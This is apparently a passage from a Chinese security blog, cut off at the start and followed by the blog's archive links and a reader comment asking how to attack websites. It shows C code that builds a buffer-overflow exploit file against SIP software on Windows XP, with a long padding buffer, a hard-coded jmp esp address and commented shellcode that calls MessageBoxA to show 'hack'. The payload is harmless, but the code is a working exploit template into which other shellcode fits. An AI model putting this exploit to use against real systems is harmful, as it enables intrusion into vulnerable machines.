0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61,
0×61, 0×61, 0×61, 0×61, 0×61, 0×61, 0×61
};
unsigned char jmpesp[] ={ //jmpesp=0×7ffa4512;
0×12, 0×45, 0xfa, 0×7f
};
unsigned char end[] = {
0×32, 0×33, 0×34, 0×35, 0×36,
0×37, 0×38, 0×39, 0×30, 0×31, 0×32, 0×33, 0×34, 0×35, 0×36, 0×37, 0×38, 0×39, 0×30, 0×31, 0×32,
0×33, 0×34, 0×35, 0×36, 0×37, 0×38, 0×39, 0×30, 0×31, 0×32, 0×33, 0×34, 0×35, 0×36, 0×37, 0×38,
0×39, 0×30, 0×31, 0×32, 0×33, 0×34, 0×35, 0×36, 0×37, 0×38, 0×39, 0×30, 0×31, 0×32, 0×33, 0×34,
0×35, 0×36, 0×37, 0×38, 0×39, 0×30, 0×31, 0×32, 0×33, 0×34, 0×35, 0×36, 0×37, 0×38, 0×39, 0×30,
0×31, 0×32, 0×33, 0×34, 0×35, 0×36, 0×37, 0×38, 0×3A, 0×30, 0×20, 0×50, 0×43, 0×4D, 0×55, 0×2F,
0×38, 0×30, 0×30, 0×30, 0×0D, 0×0A
};
unsigned char scode[] =
"\xB8"
"\x75\xC1\xe4\x88" //Address of MessageBoxA + 0×11111111
"\x2D\x11\x11\x11\x11\x50\x59\x33\xc0\x50\x68"
"\x68\x61\x63\x6b" //"hack"
"\x54\x5a\x50\x52\x52\x50\x53\x51\xc3";
//Shellcode:
//B8 75C1e488 MOV EAX,88e4C175 ; MessageBoxA + 0×11111111 to
//2D 11111111 SUB EAX,11111111 ; Make characters readable
//50 PUSH EAX ; xchg registers : eax = 77D3b064
//59 POP ECX ; Offset to API.
//33C0 XOR EAX,EAX ; Create Null
//50 PUSH EAX ; Put ascii0 end of string
//68 6861636b PUSH 6b636168 ; Create string.= hack
//54 PUSH ESP ; Get the offset to the
//5A POP EDX ; Message String
//MessageBox call
//50 PUSH EAX ; Null Pointer
//52 PUSH EAX ; Message
//52 PUSH EDX ; Message
//50 PUSH EAX ; Null Pointer
//53 PUSH EBX ; Return address: 0×00000000
//51 PUSH ECX ; Address of MessageBoxA
//C3 RETN ; Jump
int main()
{
FILE *stream;
unsigned char *exploitbuf;
int size;
char *filename = "sip_overbuf_exploit.dat";
DWORD msgboxaddr = (DWORD)MessageBoxA; //Windows XP EN SP2 MessageBoxA address = 0×77d6e824;
//If others, just change it;
size = sizeof(invite)+sizeof(jmpesp)+sizeof(end);
exploitbuf = (unsigned char *)malloc(size);
printf("exploitbuf len = %d\n", size);
memcpy(exploitbuf, invite, sizeof(invite));
memcpy(exploitbuf+sizeof(invite), jmpesp, sizeof(jmpesp));
memcpy(exploitbuf+sizeof(invite)+sizeof(jmpesp), end, sizeof(end));
*(DWORD *)&scode[1] = msgboxaddr+0×11111111;
memcpy(exploitbuf+sizeof(invite)+sizeof(jmpesp), scode, sizeof(scode));
if( (stream = fopen( filename, "w+b" )) == NULL )
printf("Build File Error!!!\n");
else
printf("Build File %s successful! ^_^\n", filename);
free(exploitbuf);
fwrite( exploitbuf, size, 1, stream );
fclose(stream);
}
news
导航
分类
Game
Security Link
Study
worship
-
最新日志
存档
- 2007年03月 (1)
- 2006年12月 (1)
- 2006年11月 (1)
- 2006年10月 (1)
- 2006年09月 (2)
- 2006年08月 (1)
- 2006年07月 (2)
- 2006年06月 (3)
- 2006年03月 (1)
- 2006年02月 (3)
- 2006年01月 (7)
- 2005年12月 (2)
- 2005年10月 (9)
- 2005年09月 (13)
- 2005年08月 (8)
- 2005年07月 (6)
- 2005年06月 (1)
- 2005年05月 (6)
- 2005年04月 (8)
- 2005年03月 (11)
- 2005年02月 (11)
- 2005年01月 (9)
- 2004年12月 (39)
- 2004年11月 (22)
- 2004年10月 (77)
- 2004年09月 (47)
- 2004年08月 (281)
- 2004年07月 (211)
- 2004年06月 (46)
-
最新评论
- 匿名 发表于《一个发送邮件的C++库–jwsmtp》
- ss 发表于《一个发送邮件的C++库–jwsmtp》
- 匿名 发表于《一个有意思的网页登陆验证代码》
- 游戏 发表于《最近最值得关注的两大新闻》
- 刷游戏币 发表于《关于ALERT.TXT的通告》
hi man how you doing? i want how to attacker web and
how to use in winxp and what command i write
thnaks
hey hey —— 2006年01月13日 @8:41 am